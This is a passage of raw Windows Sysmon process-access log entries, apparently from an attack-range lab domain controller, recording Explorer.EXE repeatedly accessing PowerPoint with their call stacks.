Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081732Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081731Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081730Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081729Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081728Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081727Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081726Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081725Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081724Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081723Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081722Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081721Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081720Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081719Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081718Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081717Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081716Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081715Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081714Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081713Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081712Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081711Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081710Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081709Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081708Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081707Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081706Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.512{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft 